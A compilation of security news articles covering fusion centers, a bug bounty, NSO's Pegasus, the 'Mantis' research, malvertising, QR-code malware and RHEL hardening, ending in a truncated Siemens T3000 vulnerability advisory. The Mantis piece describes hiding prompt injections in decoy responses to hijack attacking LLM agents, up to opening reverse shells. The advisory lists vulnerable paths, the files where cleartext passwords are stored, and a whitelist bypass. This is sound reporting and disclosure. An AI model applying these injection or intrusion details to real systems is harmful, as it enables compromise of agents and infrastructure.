Built to combat terrorism, fusion centers give US Immigration and Customs Enforcement a way to gain access to data that’s meant to be protected under city laws limiting local police cooperation with ICE.

On the campaign trail and in recent days, Donald Trump has detailed extensive plans for immigration crackdowns and mass deportations during his second term as United States president. These initiatives would, he has said, include aggressive operations in areas known as “sanctuary cities” that have laws specifically curtailing local law enforcement collaboration with US Immigration and Customs Enforcement (ICE).

With these promises looming, a new report from researchers at the Surveillance Technology Oversight Project (STOP), a pro-privacy nonprofit, details the ways that federal/local data-sharing centers known as “fusion centers” already result in cooperation between federal immigration authorities and sanctuary-city law enforcement.

Run by the US Department of Homeland Security, of which ICE is a part, fusion centers emerged in the wake of the September 11, 2001, attacks as a counterterrorism initiative for integrating intelligence between federal, state, and local law enforcement. Fusion centers spent $400 million in 2021, according to public records. And, as STOP researchers point out, in more than two decades the centers have never proven their worth for their stated purpose of addressing terrorism in the US. Unnamed DHS officials told a Senate panel in 2012, for example, that fusion centers produce “predominantly useless information” and “a bunch of crap.”

In addition to aggressive investigative tactics like pulling data from schools and abortion clinics, ICE agents have leaned on fusion centers for years to get everything from photos of suspects to license plate location data and more—often in a pipeline that includes input from law enforcement working in sanctuary cities.

“This is an area where it’s highly profitable for localities to cooperate with ICE, and because it’s not highly visible it oftentimes faces less pushback," says STOP executive director Albert Fox Cahn. “This sort of information sharing capacity on this scale across all these agencies. tapping into everything from local utility records and DMV records to school records has the potential to be deployed in any number of chilling scenarios.”

ICE did not immediately return a request from WIRED for comment.

Fox Cahn adds that the concept of sanctuary cities wasn't always viewed by regional cops as an inconvenience to work around. “Until recently a lot of law enforcement agencies were very vocal in supporting sanctuary city protections, because they feared that ICE collaboration would actually hurt public safety if immigrants were not willing to come forward when they were victims of a crime or witness to a crime,” he says. “But police have become much more politically engaged on immigration in recent years.”

Fusion centers give ICE officers a forum through which to request data from local law enforcement databases in sanctuary cities and take advantage of regional surveillance tools, including publicly deployed face recognition systems, that can't be directly used to aid deportation efforts under sanctuary laws. STOP argues that when cops from sanctuary cities share data with ICE through fusion centers, it believes they may be violating local laws, but the activity is less obviously a violation than if the sharing happened through a direct channel.

In addition to undermining the entire purpose and premise of sanctuary city laws, STOP researchers point out, such erosion of guardrails around data sharing broadly could easily become a national security issue if a foreign actor were to infiltrate a fusion center. And domestically, the free-wheeling environment within fusion centers means that law enforcement could easily turn the spotlight onto additional types of investigations without warning.

“What we’ve seen over and over again is that the policing infrastructure we’ve built up in the name of combatting one evil then gets re-purposed for another," Fox Cahn says. “People who maybe don’t care as much about immigration need to recognize that if this infrastructure can be re-targeted at undocumented communities the way it has been today, it can be repurposed for any number of policing priorities in the future.”

Fusion centers will almost certainly play a role in the Trump administration's immigration agenda, but the STOP research is a reminder that these information-sharing hubs may well be at the center of other far-flung law enforcement initiatives as well.

Immigration Police Can Already Sidestep US Sanctuary City Laws Using Data-Sharing Fusion Centers

Our security teams work around the clock to help protect every person and organization on the planet from security threats. We also know that security is a team sport, and that’s why we also partner with the global security community through our bug bounty programs to proactively identify and mitigate potential issues before our customers are impacted.

Our security teams work around the clock to help protect every person and organization on the planet from security threats. We also know that security is a team sport, and that’s why we also partner with the global security community through our bug bounty programs to proactively identify and mitigate potential issues before our customers are impacted. Unique perspectives from the brightest security minds add another layer to our overall strategy to protect our ecosystem. By incentivizing high-impact research, we raise the security bar for everyone.  

Today, we are building on that history of partnership and expanding our bug bounty programs with the Zero Day Quest. This new hacking event will be the largest of its kind, with an additional $4 million in potential awards for research into high-impact areas, specifically cloud and AI. Zero Day Quest will provide new opportunities for the security community to work hand in hand with Microsoft engineers and security researchers – bringing together the best minds in security to share, learn, and build community as we work to keep everyone safe.  

The quest begins today with a research challenge, where vulnerability submissions within targeted scenarios during the event are eligible for multiplied bounty awards. Submissions can also qualify researchers for a spot in the onsite hacking event in Redmond, WA, in 2025.  

To advance AI security, starting today we will offer double AI bounty awards. We will also offer researchers direct access to the Microsoft AI engineers focused on developing secure AI solutions, and our AI Red Team. This unique opportunity will allow participants to enhance their skills with cutting-edge tools and techniques and work with Microsoft to raise the bar for AI security across the ecosystem – making everyone safer. Register for a training session with the Microsoft AI Red Team today.  

In alignment with our Coordinated Vulnerability Disclosure (CVD) approach, researchers will be encouraged to publicly discuss their findings once mitigated, with support from Microsoft through blogs, podcasts, and videos to ensure we can all learn and build on this work. As part of our Secure Future Initiative (SFI), we will transparently share critical vulnerabilities through the Common Vulnerabilities and Exposures (CVE) program, even if they require no customer action. Learnings from the Zero Day Quest will be shared across Microsoft to help improve cloud and AI security - by default, by design, and in operations.  

This event is not just about finding vulnerabilities; it’s about fostering new and deepening existing partnerships between the Microsoft Security Response Center (MSRC), product teams, and external researchers – raising the security bar for all. Join us in this exciting journey as we push the boundaries of cybersecurity and work together to create a safer digital world.

_Tom Gallagher_  
_VP of Engineering, Microsoft Security Response Center (MSRC)_

Securing AI and Cloud with the Zero Day Quest

Freshly released court documents reveal new details on controversial Israeli spyware firm's operations.

Source: Shubham singh 007 via Shutterstock

Israel's NSO Group may know a lot more about how customers use its Pegasus commercial spyware product than the company has let on, newly released court documents connected to a legal dispute with Meta's WhatsApp suggest.

In fact, NSO Group installed and operated the spyware on behalf of its customers, making the company directly liable for the spyware's use, WhatsApp lawyers said in one court filing, released Nov. 14 in the US District Court for the Northern District of California.

The court documents are part of a lawsuit that WhatsApp filed against NSO Group in October 2019 after discovering the Israeli firm had used WhatsApp servers to distribute Pegasus to some 1,400 mobile phones, including those belonging to journalists and rights activists.

The lawyers also claimed that NSO Group repeatedly developed and used exploits for abusing WhatsApp's servers to install Pegasus on target devices, including at least once after WhatsApp had sued the company over the issue.

**NSO 'Solely Responsible'**

"NSO is solely responsible for Pegasus’s unauthorized access to WhatsApp's servers," the social media giant noted in one briefing. "Despite what NSO has claimed, its customers had a minimal role in how the spyware tool operated or collected information. All that NSO Group customers typically had to do was enter their target's phone number, press install and wait for the malware to install on the target device without any further interaction," they noted.

Related:Trustwave-Cybereason Merger Boosts MDR Portfolio

"In other words, the customer simply places an order for a target device's data, and NSO controls every aspect of the data retrieval and delivery process through its design of Pegasus," WhatsApp's lawyers said. The company, in fact, was so aware of how customers were using its malware that it actually disconnected service to 10 customers for excessive abuse, the lawyers claimed.

**Controversial Surveillance Software**

Pegasus is a controversial mobile spyware designed to secretly monitor and extract data from iOS and Android smartphones. Once installed, Pegasus can intercept messages, emails, media, and passwords, and track location data, all while evading detection by antivirus software. NSO Group claims to sell the technology solely to authorized government agencies for legitimate law enforcement, crime-fighting, and anti-terror purposes. But critics argue that the tool has been misused, particularly in authoritarian regimes, to target journalists, human rights activists, political dissidents, and others critical of the government.  

Related:Xiphera & Crypto Quantique Announce Partnership

A 2021 database leak revealed that NSO Group customers had, at the time, targeted more than 50,000 phone numbers for surveillance in countries like Mexico, Hungary, and India. The US government formally blacklisted the company in 2021, meaning its ability to operate in the US or do business with US entities abroad is severely restricted.

The NSO Group has tried to get US courts to dismiss WhatsApp's lawsuit against the company, citing, among other things, a lack of jurisdiction and the fact that its clients are mostly governments and therefore are not doing anything illegal. WhatsApp lawyers have sought to portray NSO Group as indeed being liable for Pegasus by attempting to tie the vendor more directly to customer use of the spyware tool.

In the newly released court documents, WhatsApp has alleged that NSO Group repeatedly and deliberated worked around the mechanisms the company put in place to prevent misuse of the secure messaging platform. One of them was a modified WhatsApp client app called the WhatsApp Installation Server (WIS) that could access WhatsApp's back-end servers in ways its own client software could not. NSO Group then developed tools named Heaven and Eden to interact with WIS in such a way as to trigger Pegasus downloads on target phones via WhatsApp. The company developed Eden after WhatsApp discovered Heaven and put up blocks against it. When WhatsApp engineers discovered Eden, NSO developed and used yet another tool, called Erised, through 2020, or after WhatsApp had filed its lawsuit.

Related:North Korea's Andariel Pivots to 'Play' Ransomware Games

The WhatsApp lawsuit is one of several that NSO Group is currently battling in courts worldwide from organizations and individuals impacted by the malware. In September, Apple sought voluntary dismissal of a 2021 lawsuit it had filed against NSO Group, citing concerns over the company having to share information with the court that other spyware makers could abuse going forward.

Back when the lawsuit was filed, the NSO Group was among a handful of known purveyors of such mobile spyware software. Since then, there has been a sharp increase in the number of commercial spyware vendors, driven largely by demand from government agencies. A Google report earlier this year identified spyware vendors like NSO Group as being responsible for nearly half of all zero-day exploits it counted between mid-2014 and December 2023.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

WhatsApp: NSO Group Operates Pegasus Spyware for Customers

Experimental counter-offensive system responds to malicious AI probes with their own surreptitious prompt-injection commands.

Source: Valentin Baciu via Shutterstock

Companies worried about cyberattackers using large-language models (LLMs) and other generative AI systems that automatically scan and exploit their systems could gain a new defensive ally — a system capable of subverting the attacking AI.

Dubbed Mantis, the defensive system uses deceptive techniques to emulate targeted services and — when it detects a possible automated attacker — sends back a payload that contains a prompt-injection attack. The counterattack can be made invisible to a human attacker sitting at a terminal and will not affect legitimate visitors who are not using malicious LLMs, according to the paper penned by a group of researchers from George Mason University.

Because LLMs used in penetration testing are singularly focused on exploiting targets, they are easily co-opted, says Evgenios Kornaropoulos, an assistant professor of computer science at GMU and one of the authors of the paper.

"As long as the LLM believes that it's really close to acquiring the target, it will keep trying on the same loop," he says. "So essentially, we are kind of exploiting this vulnerability — this greedy approach — that LLMs take during these penetration-testing scenarios."

Cybersecurity researchers and AI engineers have proposed a variety of novel ways for LLMs to be used by attackers. From the ConfusedPilot attack, which uses indirect prompt injection to attack LLMs when they are ingesting documents during retrieval-augmented generation (RAG) applications, to the CodeBreaker attack, which causes code-generating LLMs to suggest insecure code, attackers have automated systems in their sights.

Yet, research on offensive and defensive uses of LLMs is still early: AI-augmented attacks are essentially automating the attacks that we already know about, says Dan Grant, principal data scientist at threat-defense firm GreyNoise Intelligence. Yet, signs of increasing use of automation among attackers is increasing: the volume of attacks has been slowly increasing in the wild and the time to exploit a vulnerability has been slowly decreasing.

"LLMs enable an extra layer of automation and discovery that we haven't really seen before, but \[attackers are\] still applying the same route to an attack," he says. "If you're doing a SQL injection, it's still a SQL injection whether an LLM wrote it or human wrote it. But what it is, is a force multiplier."

**Direct Attacks, Indirect Injections, and Triggers**

In their research, the GMU team created a game between an attacking LLM and a defending system, Mantis, to see if prompt injection could impact the attacker. Prompt injection attacks typically take two forms. Direct prompt injection attacks are natural-language commands that are entered directly into the LLM interface, such as a chatbot or a request sent to an API interface. Indirect prompt injection attacks are statements included in documents, web pages, or databases that are ingested by an LLM, such as when an LLM scans data as part of a retrieval-augmented generation (RAG) capability.

In the GMU research, the attacking LLM attempts to compromise a machine and deliver specific payloads as part of its goal, while the defending system aims to prevent the attacker's success. An attacking system will typically use an iterative loop that assesses the current state of the environment, selects an action to advance toward its goal, execute the action, and analyze the targeted system's response.

Using a decoy FTP server, Mantis sends a prompt-injection attack back to the LLM agent. Source: "Hacking Back the AI-Hacker" paper, George Mason University

The GMU researchers' approach is to target the last step by embedding prompt-injection commands in the response sent to the attacking AI. By allowing the attacker to gain initial access to a decoy service, such as a web login page or a fake FTP server, the group can send back a payload with text that contains instructions to any LLM taking part in the attack.

"By strategically embedding prompt injections into system responses, Mantis influences and misdirects LLM-based agents, disrupting their attack strategies," the researchers stated in their paper. "Once deployed, Mantis operates autonomously, orchestrating countermeasures based on the nature of detected interactions."

Because the attacking AI is analyzing the responses, a communications channel is created between the defender and the attacker, the researchers stated. Since the defender controls the communications, they can essentially attempt to exploit weaknesses in the attacker's LLM.

**Counter Attack, Passive Defense**

The Mantis team focused on two types of defensive actions: Passive defenses that attempt to slow the attacker down and raise the cost of their actions, and active defenses that hack back and aim to gain the ability to run commands on the attacker's system. Both strategies were effective with a greater than 95% success rate using the prompt-injection approach, the paper stated.

In fact, the researchers were surprised at how quickly they could redirect an attacking LLM, either causing it to consume resources or even to open a reverse shell back to the defender, says Dario Pasquini, a researcher at GMU and the lead author of the paper.

"It was very, very easy for us to steer the LLM to do what we wanted," he says. "Usually, in a normal setting, prompt injection is a little bit more difficult, but here — I guess because the task that the agent has to perform is very complicated — any kind of injection of prompt, such as suggesting that the LLM do something else, is \[effective\]."

By bracketing a command to the LLM with ANSI characters that hide the prompt text from the terminal, the attack can happen without the knowledge of a human attacker.

**Prompt Injection is the Weakness**

While attackers who want to shore up the resilience of their LLMs can attempt to harden their systems against exploits, the actual weakness is the ability to inject commands into prompts, which is a hard problem to solve, says Giuseppe Ateniese, a professor of cybersecurity engineering at George Mason University.

"We are exploiting those something that is very hard to patch," he says. "The only way to solve it for now is to put some human in the loop, but if you put the human in the loop, then what is the purpose of the LLM in the first place?"

In the end, as long as prompt-injection attacks continue to be effective, Mantis will still be able to turn attacking AIs into prey.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

AI About-Face: 'Mantis' Turns LLM Attackers Into Prey

A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing…

A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked into installing malicious Chrome browser extensions.

Cybersecurity researchers at Bitdefender have uncovered a malicious advertising (malvertising) campaign that exploits **Meta’s advertising platform** to distribute malware on Facebook. This campaign, detected on November 3, 2024, disguises the malware as a security update for the popular **Bitwarden password manager**. Although the campaign has been taken down, experts warn that similar threats are likely to resurface.

****From Malicious Facebook Ads to Fake Chrome Store****

The campaign uses **deceptive Facebook ads** that appear to be legitimate security updates for Bitwarden. These ads warn users about the risk of compromised passwords and trick them into installing an urgent security update for the password manager. The ads are designed to look authentic, using Bitwarden’s branding and language to create a sense of urgency.

When users click on these ads, they are redirected through a series of websites before reaching a phishing page that mimics the official Chrome Web Store. This final page notifies users to install a **malicious browser extension** disguised as a Bitwarden update. The installation process involves downloading a zip file from Google Drive, unzipping it, and manually loading the extension into the browser.

According to Bitdefender’s **blog post** shared with Hackead.com heard of its publishing on Monday, once installed, the malicious Chrome extension requests permissions, enabling it to intercept and exploit the user’s online activities.

Some key permissions requested include access to all websites, modification of network requests, and access to storage and cookies. The extension’s manifest file reveals these permissions, indicating its ability to perform various malicious activities.

Researchers noted that the core of the attack lies within the background.js script, which activates upon installation. This script performs several critical tasks data exfiltration which the collected data is sent to a Google Script URL acting as a command-and-control server, cookie harvesting which allows attackers to search for Facebook cookies, particularly the c_user cookie containing the user’s Facebook ID. The script also gathers IP address and geolocation data and extracts personal and business information from Facebook using the Graph API.

Malicious Facebook ads (left) – Malicious Chrome extension (right) – Screenshot via Bitdefender

****Impacted Users****

The malware’s primary targets are Facebook business accounts putting unsuspected individuals and organizations at risk. The malvertising campaign has already reached thousands of users, primarily in Europe, with the possibility to expand globally.

If you use Facebook for business purposes and manage a business account, it’s important to stay cautious. If you come across a malicious ad prompting you to install updates, avoid clicking on it. Instead, visit the official website of the product to verify and access legitimate security updates.

1.  Fake Ads Manager Software Target Facebook Accounts
2.  Fake LastPass Password Manager App Lurks on iOS App Store
3.  Fake League of Legends Download Ads Spread Lumma Stealer
4.  PasswordState password manager’s update hijacked to drop malware
5.  Fake Meta Ads Hijack Facebook Accounts to Spread SYS01 Infostealer

Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden

A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.

Physical letters that contain a QR code to trick people into downloading malware are being sent through the mail, according to a warning issued by The Swiss National Cyber Security Centre (NCSC).

The letters are sent as if they come from the official Swiss Federal Office of Meteorology and Climatology (MeteoSwiss) and they urge the recipient to install a new “severe weather app.”

This app, however, does not exist, and the letters do not come from MeteoSwiss either.

Scanning the QR code in the malicious letters leads to a banking Trojan known as Coper, but also referred to as Octo2. Coper is a Malware-as-a-Service which “customers” can spread as they see fit, but they pay for the use of the malicious software and the underlying infrastructure. These customers are running campaigns targeting Europe, the US, Canada, the Middle East, Singapore, and Australia.

Coper is a sophisticated banking Trojan that has several advanced features:

*   Device Takeover (DTO) capabilities for remote control
*   Advanced obfuscation techniques to avoid detection
*   Overlay attacks aimed at credential theft

The fake “meteorology app” for this malware campaign is disguised under the name “AlertSwiss” when installed on Android devices, but Coper cybercriminals can customize these names for all other campaigns. That adaptability makes for a more convincing lure depending on which country or region is being targeted. For instance, “AlertSwiss” is a clear attempt to fake the name of an official app from the Federal Office for Civil Protection which is used by federal and cantonal agencies to inform, warn, and alert the population. That real app’s name is “Alertswiss” (note the tiny difference).

Using QR codes in snail mail offers the criminals a few advantages. People may not expect to end up with their device infected by something as non-technical as a physical letter. And QR codes get typically read by mobile devices, which—unfortunately—still get overlooked when it comes to installing security software.

QR codes are becoming more common, especially after the COVID-19 pandemic which pushed many restaurants into using digital menus instead of physical menus that are shared between customers (in the earliest days of COVID lockdowns, science was still emerging on the risk levels of touching shared objects). Because of so much change in the past few years, seeing a QR code in a letter from an official institution does not trigger any alarm bells anymore.

And many Android users suffer from either a “patch gap” or are even using Android versions that are no longer supported, so will never receive another security update. One of the main causes for a patch gap is the time it takes a fix for a known vulnerability to trickle down from software vendor to individual device manufacturers, which then need to make it available for the users.

**Security advice**

*   Keeping your device up to date protects you from known vulnerabilities and helps you to stay safe.

We have found that many users have no idea whether their devices are still receiving updates. You can find your device’s Android version number, security update level, and Google Play system level in your Settings app. You’ll get notifications when updates are available for you, but you can also check for them yourself.

For most phones it works like this: Under **About phone** or **About device** you can tap on **Software updates** to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

*   Scan a QR code with the same security mindset as clicking a link

If you scan a QR code, make sure to use an app that shows you the full URL and asks you first before it visits the URL encoded in the QR code. If you do not trust the URL, don’t allow your device to open the link and, if necessary, research to find another, more trustworthy, way to get the information or download you want. Modern Android devices (version 8 and above) have a native QR code scanning capability built into the camera app. Some QR code scanner apps may have a feature that automatically executes actions like opening a website or downloading a file. Disable such features.

*   Use anti-malware protection on your devices

Your mobile devices are in need of protection just as much as your computer. Malwarebytes offers customers Malwarebytes for Android and Malwarebytes for iOS. Malwarebytes detects Coper as Android/Trojan.Banker.Ink.a.

 Malicious QR codes sent in the mail deliver malware 

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more se

Security is important in enterprise scenarios, where core business applications need to run seamlessly but are often connected to the external world where they are vulnerable to attack.

Malware, unauthorized access to files and execution of unverified code are just some examples of how system security can be compromised, not only by exploiting known bugs and vulnerabilities, but also by the lack of appropriate countermeasures.

Red Hat Enterprise Linux (RHEL) can help, as it provides some tools and services that can natively support the process of system hardening to help make your system more secure.

In this article, we explore some of the tools included in RHEL that will help you start hardening your systems to better prevent access to files, processes and applications.

****Implementing access control with SELinux****

Many RHEL customers and users have experienced issues when trying to run custom applications, operating on standard folders and locations of common processes, or even just trying to open ports for their web services.

In 99% of these cases, the "issues" were caused by Security-Enhanced Linux (SELinux).

SELinux comes enabled by default in RHEL and it is a security framework that helps system administrators implement Mandatory Access Control (MAC) instead of Discretionary Access Control (DAC). MAC takes into account access modes, groups and users that can operate on files, folders and applications. Additionally, it implements a complex set of access rules, based on labels and types, that uniquely identify which processes can access specific files, folders and ports.

****MAC example****

Let's look at httpd as an example:

*   Httpd runs with a default SELinux type of **httpd\_d**
*   The folder /var/www/html/ has **httpd\_sys\_content\_t**
*   SELinux expects the process to access specific ports (80, 443, 8080, 8443 among others) and has assigned those ports a specific label, **http\_port\_t**

Suppose we try to run httpd with a different folder (i.e. /var/www/my\_site) and a different port (i.e. 4449). When we try to start the httpd service, SELinux will prevent it until we manually add the new folder and the chosen port to the labels mentioned above.

Rules for most of the applications and processes that are shipped with RHEL are already established, but they can be customized and extended to match your needs, so you can adapt them to custom applications.

Out of the box, RHEL offers a dedicated system role for Ansible that will simplify and automate the operations involving SELinux labeling and verification.

****Preventing non-standard applications from running in your environment with fapolicyd****

With SELinux we can control how processes can access files, folders and ports, but what if we want to make sure that only what comes with the RHEL can be executed?

fapolicyd is a lightweight security framework that includes a daemon whose role is to make sure that only applications that are installed as trusted RPMs can be executed.

This is possible because fapolicyd uses a specific database and a set of rules that keeps track of packages and their content that are installed using the package manager (and are present in the RPM database), so those, and only those, can be executed.

With fapolicyd installed and running in your RHEL machine, trying to create and run a Bash script or move and run the default applications present in the /usr/bin or /bin folders elsewhere in the system will result with a permission denied error.

Similar to SELinux, fapolicyd comes with a set of predefined rules that can be easily extended to match your operative requirements, also covering rules for scripts, MIME types and more.

By default, fapolicyd operates on byte size of the executable, but it can also support integrity checking.  This means that even if an attacker manages to replace an executable with a malicious version that's the same size, fapolicyd can still prevent it from running.

This is crucial when it comes to preventing unwanted applications such as rootkits, malware or any other harmful executables from running and disrupting your system.

****Intrusion detection made simple - AIDE, IMA and EVM****

One of the most common attack vectors is when existing files and processes are altered to inject malicious code or configurations, making the system vulnerable to attacks or exploits.

Advanced Intrusion Detection Environment (AIDE) is a tool, included in RHEL, that enables integrity checks for the whole system, maintaining an updated database of all files and folders to track any added or removed files, location changes or other suspicious activity.

The database can be updated using a cron job, so it is always up-to-date and aligned with the current system status.

RHEL also supports a lower-level Integrity Measurement Architecture (IMA) that is implemented at kernel level. This supports creating and maintaining hashes of all local files, and can implement a runtime check using a kernel hook to prevent executing and/or accessing files that have been altered or have failed verification checks.

If used in combination with the Extended Verification Module (EVM) kernel module, the kernel can also perform checks on the extended attributes of files, drastically reducing the chances that any modification performed by a malicious entity can compromise the integrity of the system.

****Wrap up****

The tools we discussed here are just some of the utilities and frameworks that RHEL includes to improve system security and integrity.

In a previous article, we also covered how Red Hat Insights, the SaaS (Software as a Service) solution hosted on Red Hat Console can be used to detect malware in systems.

Please don’t hesitate to contact us if you would like to learn more!

****Further reading****

*   Enhancing security with the Kernel integrity subsystem
*   RHEL Security hardening

Hardening your operating system? Red Hat Enterprise Linux to the rescue!

Siemens Energy Omnivise T3000 version 8.2 SP3 suffers from local privilege escalation, cleartext storage of passwords in configuration and log files, file system access allowing for arbitrary file download, and IP whitelist bypass.

    SEC Consult Vulnerability Lab Security Advisory < 20241112-0 >=======================================================================              title: Multiple vulnerabilities            product: Siemens Energy Omnivise T3000 vulnerable version: >=8.2 SP3      fixed version: see solution section         CVE number: CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879             impact: High           homepage: https://www.siemens-energy.com/global/en/home/products-services/product/omnivise-t3000.html              found: 2024-06-02                 by: Steffen Robertz (Office Vienna)                     Andreas Kolbeck (Office Munich)                     SEC Consult Vulnerability Lab                     An integrated part of SEC Consult, an Eviden business                     Europe | Asia                     https://www.sec-consult.com=======================================================================Vendor description:-------------------"Located in 90 countries, Siemens Energy operates across the whole energy landscape.From conventional to renewable power, from grid technology to storage to electrifyingcomplex industrial processes.Our mission is to support companies and countries with what they need to reducegreenhouse gas emissions and make energy reliable, affordable, and more sustainable.Let’s energize society."Source: https://www.siemens-energy.com/global/en/home/company/about.htmlBusiness recommendation:------------------------Siemens has released their security advisory SSA-857368, see the following URLfor further details:https://cert-portal.siemens.com/productcert/html/ssa-857368.html#mitigations-sectionFollow the mitigation instructions communicated in Omnivise T3000 Technical News 2024-089and SE Controls Security Announcement 2024-01.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)Insecurely configured services or the insecure configuration of their authorizationslead to privilege escalation vulnerabilities in the Windows operating system. It ispossible for a low-privileged user to modify a service in such a way that it executesarbitrary code instead of starting the actual service. The service path is writable bythe "Authenticated Users" group.Precondition for exploitation: requires authenticated local access to the Terminal Serverof the T3000 system.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered. These can be usedto jump from host to host and thus compromise the whole security architecture ofthe T3000 system.Precondition for exploitation: requires administrative local access to any server of theT3000 system.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView application is a web application hosted on the applicationserver. One parameter accepts a full path, which can be abused to download arbitraryfiles.Precondition for exploitation: requires administrative remote access to the Applicationserver of the T3000 system.4) IP Whitelist Bypass (CVE-2024-38879)The application server is hosting the T3000 web application on port 8080. However,only the Terminal Server is whitelisted. This whitelisting can be circumvented byexploiting the additionally exposed Tomcat AJP service on port 8009.Precondition for exploitation: requires unauthenticated remote access to the Applicationserver of the T3000 systemProof of concept:-----------------1) Local Privilege Escalation via Writable Service Binary (CVE-2024-38876)The following path hosts a file that is used by the "DSGW Service" of the T3000 system:"E:\dsgw\gw\bin\dsgwservice.exe"The path is writable by the "Authenticated Users" group.2) Cleartext Storage of Passwords in Config and Log Files (CVE-2024-38877)Multiple files containing cleartext passwords were discovered.Terminal Server:* C:\Program Files\SPPA-T3000\snmpv3trap\Config.properties (only readable by Admin)* E:\DSGW\GW\config_PDC.properties (Passwords are Base64 encoded)* C:\Program Files\SPPA-T3000\Logs\AppInstallLogs\PostInstallConfigList.xml (Readable by every user)Application Server:* D:\SPPA-T3000\_framework\_jre\installvariables.properties (contains passwords of tomcat and MySQL service* D:\SPPA-T3000\Orion\install\_uninstall\installvariables.properties (contains password for MySQL service and installation)All Servers:All servers are being deployed via Puppet. However, the cache file is nevercleared and contains the initial passwords of all systems of the T3000 system:"C:\Program Data\PuppetLabs\puppet\cache\client_data\catalog\<uid.json>"---------------------------------------[...]"parameters": {"foreman_pass": "[redacted]","foreman_url": "[redacted]","foreman_user": "puppet_provider","is_sec": "true","mpssvc_pass": "[redacted]"}[...]"parameters": {"crsphost": "XXX.XXX.XXX.XXX","crsppswd": "","crsprepo": "AVPatterns","crspservice": "SFTP","crspuser": "siem_t3000_west","primary_ts": true}[...]"parameters": {[...]"snmpv3_authpass": "[redacted]","snmpv3_privpass": "[redacted]","snmpv3_user": "snmpuser","snmpv3_hash": "SHA","snmpv3_encrypt": "AES"}[...]"parameters": {[...]"cyg_server_passwd": "[redacted]",[...]"fst_appsrv_passwd": "","fst_appsrv_red_hgw_ip": "XXX.XXX.XXX.XXX",[...]"icmauser_passwd": "[redacted]",[...]"opcadmin_passwd": "[redacted]","operator01_passwd": "[redacted]","operator02_passwd": "[redacted]","operator03_passwd": "[redacted]","operator04_passwd": "[redacted]","operator05_passwd": "[redacted]","operator06_passwd": "[redacted]","operator07_passwd": "[redacted]","operator08_passwd": "[redacted]","operator09_passwd": "[redacted]","operator10_passwd": "[redacted]","operators_password": "[redacted]","pdm01_passwd": "[redacted]","pdm02_passwd": "[redacted]","pdm03_passwd": "[redacted]","pdm04_passwd": "[redacted]","pdm05_passwd": "[redacted]","pdm06_passwd": "[redacted]","pdm07_passwd": "[redacted]","pdm08_passwd": "[redacted]","pdm09_passwd": "[redacted]","pdm10_passwd": "[redacted]","pmas_passwd": "[redacted]","pmsvc_passwd": "[redacted]","pmts_passwd": "[redacted]","reparchive_passwd": "[redacted]",[...]"t3kservice_passwd": "[redacted]","[...]"tomcatadmin_passwd": "[redacted]","tsuser01_passwd": "[redacted]","tsuser02_passwd": "[redacted]","tsuser03_passwd": "[redacted]","tsuser04_passwd": "[redacted]","tsuser05_passwd": "[redacted]","tsuser06_passwd": "[redacted]","tsuser07_passwd": "[redacted]","tsuser08_passwd": "[redacted]","tsuser09_passwd": "[redacted]","tsuser10_passwd": "[redacted]","txpdomain_passwd": "[redacted]",[...]"vm_r8_passwd": "[redacted]",[...]"vm_tc_passwd": "[redacted]",[...]"vm_ts_passwd": "[redacted]",[...]"vm_whitelist_hostname": "","vm_whitelist_passwd": "","wbuser01_passwd": "[redacted]","wbuser02_passwd": "[redacted]","wbuser03_passwd": "[redacted]","wbuser04_passwd": "[redacted]","wbuser05_passwd": "[redacted]","wbuser06_passwd": "[redacted]","wbuser07_passwd": "[redacted]","wbuser08_passwd": "[redacted]","wbuser09_passwd": "[redacted]","wbuser10_passwd": "[redacted]","wra01_passwd": "[redacted]",[...]"dsrm_passwd": "[redacted]",[...]"dc_passwd": "[redacted]",[...]"patchsvc_passwd": "[redacted]",}--------------------------------------------------To understand the impact of this file, we have to explain a little about the T3000 system.The system is split into three levels: Operator, Automation and Process.Operator Level: This is the level, where thin clients are situated. In our testcase,this level consisted of the Terminal Server that engineers could connect to. From here,they start the T3000 application, which simply loads a browser and displays a Javaapplication served from the Application Server.Automation Level: This level consists of application and automation servers. The applicationserver hosts the not time critical components of power generations such as the web server.The automation servers are taking care of time critical operations. In our testcase thesewere PLCs from the SIMATIC S7-CPU family.Process Level: This level consists of the I/O modules that are controlled by the automationservers.The Terminal Server, located on the operator level already contained the Puppet cache file,which contained all the local Windows users used in the T3000 system in clear text. As theTerminal Server communicates with the Application Server, they have to be connected via network.Thus, the attacker can use the credentials on the Terminal Server to jump to the ApplicationServer. This server is in the same segment as the physical PLC CPUs. Thus an attacker can nowalso control the PLCs and thus the whole power plant.In order to read the Puppet cache file, an attacker has to gain local admin rights first.For this, vulnerability 1 can be used.3) File System Access via RemoteDiagnosticView Website (CVE-2024-38878)The RemoteDiagnosticView website is hosted at the following URL:http:// <IP Application Server>:8080/RemoteDiagnosticViewIn our testcase it was configured using default 